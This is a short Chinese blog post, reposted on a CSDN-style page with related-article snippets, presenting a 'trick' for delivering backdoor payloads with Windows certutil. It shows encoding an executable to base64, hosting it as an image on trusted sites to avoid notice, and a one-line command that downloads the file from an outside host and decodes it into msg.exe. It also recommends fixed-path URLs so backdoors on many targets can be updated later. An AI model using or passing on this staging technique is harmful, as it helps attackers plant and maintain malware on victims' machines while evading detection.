certutil在传输payload中的新奇技巧

最新推荐文章于 2021-05-28 10:03:21 发布
最新推荐文章于 2021-05-28 10:03:21 发布
阅读量415 收藏
点赞数
原文链接:http://www.cnblogs.com/wh4am1/p/11414078.html
版权

好久没更新博客了,最近在实习的过程中还是见识到不少东西。

 

不多说,直接开始正文。

 

首先说一下certutil在渗透测试中用到的特别多,下载文件,计算hash,以及base64编码等等。

在这里介绍base64编码方式:

certutil.exe -encode .\MSGboxs.exe  pop.txt

 

-encode参数,可以将文件加密,并保存到pop.txt

生成后类似如下

再来安排一下图片

接着解密再用certutil解密

跟生成前的文件是一样的效果

可以将图片上传到安全的网站如Microsoft、Baidu、微博等不易发现的网站上

再通过这些网站进行传输文件

certutil.exe -urlcache -split -f http://chuantu.xyz/t6/702/1566812284x1031866013.jpg a.jpg && certutil.exe -decode a.jpg msg.exe

最好是上传有特定路径的网站上,如http://www.xxx.com/user/用户名.jpg

这样日后直接修改图片便可以更改多个目标上的后门程序。

生成后的文件是有开始结束标识的

-----BEGIN CERTIFICATE-----

-----END CERTIFICATE-----

 

所以可以搭配许多Web服务,直接读取其中的base64解密生成文件就可以了。

虽然隐蔽性不是很高,但作为传输后门中也不失为一种奇淫技巧。

转载于:https://www.cnblogs.com/wh4am1/p/11414078.html

weixin_30699465
关注
certutil证书管理命令
啊渊的专栏
09-23 5303
certutil是Linux系统的一个命令行工具,用于管理和操作证书和密钥。它可以用于安全套接字层(SSL/TLS)证书的导入、导出、查看和删除。certutil还可以用于创建新的证书数据库和密钥库。这个工具在Linux系统广泛用于网络安全和加密操作,提供了方便的命令行接口来处理证书和密钥。
利用certutil.exe实现在批处理(bat)嵌入exe文件的方法
09-21
### 利用certutil.exe实现在批处理(bat)嵌入exe文件的方法 #### 概述 在批处理(bat)脚本嵌入可执行文件(如exe)或其他类型的二进制文件(例如图片、音频等)是一种实用的技术,能够使脚本更加独立且便于...
利用certutil.exe 传文件
weixin_30614587的博客
02-28 912
certutill.exe 在Windows 7 及其之后的所有Windows Server和Workstation版本均预装 1. Encode file: certutil -encode kk.vbs kk_encode.vbs 2. Upload to target: 3. Decode file: cmd /c certutil -decode D:\\apache-...
Certutil工具(Windows命令行下载常用)
热门推荐
bring_coco的博客
05-28 3万+
Certutil包含一个编码参数(编码)。这有助于在Base64编码文件的内容。这是在Windows等效于Linux的base64命令。不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell命令:Add-Content test.txt “ni hao”编码(base64)
渗透测试常用的文件下载方式总结
qq_32660043的博客
02-24 1003
那些常见的文件下载姿势总结。
certutil 导入 CA 证书
weixin_34288121的博客
03-15 533
2019独角兽企业重金招聘Python工程师标准>>> ...
certutil一句话下载payload(第三十八课).docx
09-15
certutil一句话下载payload(第三十八课).docx
certutil一句话下载payload(第三十八课).pdf
05-09
certutil一句话下载payload(第三十八课).pdf
使用 certutil 实现 Hex2Bin 和 Base64 加解密的方法
09-21
### 使用 Certutil 实现 Hex2Bin 和 Base64 加解密的方法 在计算机科学与网络安全领域,数据加密是一项至关重要...对于需要在 Windows 平台上管理和操作证书的用户来说,熟练掌握 `certutil` 的使用技巧是非常有益的。
微信支付Android APP+java+CertUtil.rar
04-22
微信支付在移动应用开发扮演着重要角色,尤其是在Android平台上。这个名为"微信支付Android APP+java+CertUtil.rar"的压缩包包含了实现微信支付功能所需的Android应用代码、Java后端处理逻辑以及CertUtil工具,...
基于md5和sha1的以批处理方式实现的目录比较工具
04-14
这是两个用批处理方式实现的目录比较工具: 工具一:sha1comv3.bat 接受两个目录参数,计算两个目录里每个文件的 sha1 值,并给出报表文件 sha1v3.txt,使用方法: sha1comv3.bat 根据这 sha1comv3.bat 生成的报表文件 sha1v3.txt,可以找现两个目录 1:同名而且 sha1 相同的文件; 2:同名但是 sha1 不同的文件; 3:不同名但是 sha1 相同的文件; 4:同一目录不同名但是 sha1 相同的文件。 工具二:md5comv3.bat 接受两个目录参数,计算两个目录里每个文件的 md5 值,并给出报表文件 md5v3.txt,使用方法: md5omv3.bat 根据这 md5comv3.bat 生成的报表文件 md5v3.txt,可以找现两个目录 1:同名而且 md5 相同的文件; 2:同名但是 md5 不同的文件; 3:不同名但是 md5 相同的文件; 4:同一目录不同名但是 md5 相同的文件。 注意事项: 1:sha1comv3.bat 和 md5comv3.bat 都不接受路径带有空格的目录名,但是可以接受带有空格的文件名; 2:sha1 和 md5 的计算由 md5sum.exe 和 sha1sum.exe 完成,libiconv2.dll 和 libintl3.dll 是两个可执行文件需要的动态库; 3:sha1comv3.bat 和 md5comv3.bat 运行时会产生大量临时文件,这些文件由工具自动维护,不必手工清理。 这两个工具都是命令行方式、文本界面的,对于习惯使用图形界面的朋友来说,可能不方便,因此,不推荐习惯使用图形界面的朋友使用。 有问题请写邮件到 rubble@126.com。
certutil -v 测试证书
mkwang_0的专栏
11-11 2908
Microsoft Windows [版本 5.2.3790] (C) 版权所有 1985-2003 Microsoft Corp. D:/Documents and Settings/Administrator>certutil -v d://onets-1a9b69ade.onets.co m_hope10.crt X509 证书: 版本: 3 序列号: 4b5f8a50c1b5dd93431166dc124577bd bd 77 45 12 dc 66 11 43 93 dd
certutil在渗透测测试的使用技巧
HxXh
03-11 1535
用于备份证书服务管理,支持xp-win10更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx渗透测试的应用1、downloader(1) 保存在当前路径,文件名称和下载文件名称相同certutil -urlcache -split -f https://github.com/lijiejie/IIS_...
查看文件的MD5/SHA1效验值
weixin_34358092的博客
02-16 203
经常下载软件的朋友一定会发现,有很多下载软件网站都提供了MD5值。异次元的下载地址1一般也提供了MD5值校验码。那么什么是MD5值呢?MD5的全程是message-digest algorithm 5,是信息摘要算法的缩写,被广泛用于加密和解密技术上,它可以说是文件的“数字指纹”。任何一个文件,不管它是什么类型,也不管它体积多大,都有且只有一个独一无二的MD5信息值。 ...
Goalng计算ShA256值
RunFromHere的博客
12-28 539
Goalng计算ShA256值 关键词:golang 计算 sha256 文件 字符串 代码 //sha256 func SHA256File(path string) (string, error) { file, err := os.Open(path) defer file.Close() if err != nil { return "",err } h := sha256.New() _, err = io.Copy(h,f
Linux对下载的文件进行SHA1,MD5校验
ruhang的博客
01-04 1353
当我们从互联网下载东西或者从U盘拷贝东西的时候,通常是不会和源文件有什么区别的,但是在偶然的情况下会出现下载或者拷贝出错的情况,尤其是在下载大文件的时候,比如系统光盘......当你装机到一半才发现是坏的怎么办?所以就有了以SHA1和MD5为代表的哈希值校验,数学上的功夫就不多说了,反正就是SHA1或者MD5一致,两个文件基本就可以判断是完全一致的了。在windows下有很多工具可以校验哈希值,那
怎么查看两种SHA1码
qq_43872492的博客
09-23 1961
前言 在Android开发,有两种SHA1安全码,一种是调试安全码(debug),一种是发布安全码(release)。这些安全码一般储存在keystore文件。 获取方法 首先,点击Android Studio右上角的这个东西 会出现如下界面,你们的应该是debug而不是test1,因为这个test1是我建的(怎么建),在图可以很轻松的查看到我们keystore文件的目录 但是你们的内个部分应该是空白的,别着急,打开C盘-用户-你的用户名-.android,那里应该躺着一个debug.keystor
如何查看电脑的SHA1值
qq_29575707的博客
10-27 820
首先找到debug.keystore文件  一般在  用户目录下的.android 文件夹 然后shift+鼠标右键 在此处打开命令行, 输入命令 keytool -list -v -keystore xxx      xxx为keystore的名字,默认为debug.keystore 点击回车之后让输入密钥,直接输入android 密码默认为不可见,然后点击回车
certutil ubuntu
最新发布
08-29
在Ubuntu操作系统,`certutil` 是一个证书实用工具,用于处理和管理X.509数字证书、私钥和其他证书相关数据。它可以帮助用户创建、查看、删除证书,以及签发、撤销证书等操作。`certutil` 是OpenSSL的一部分,在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值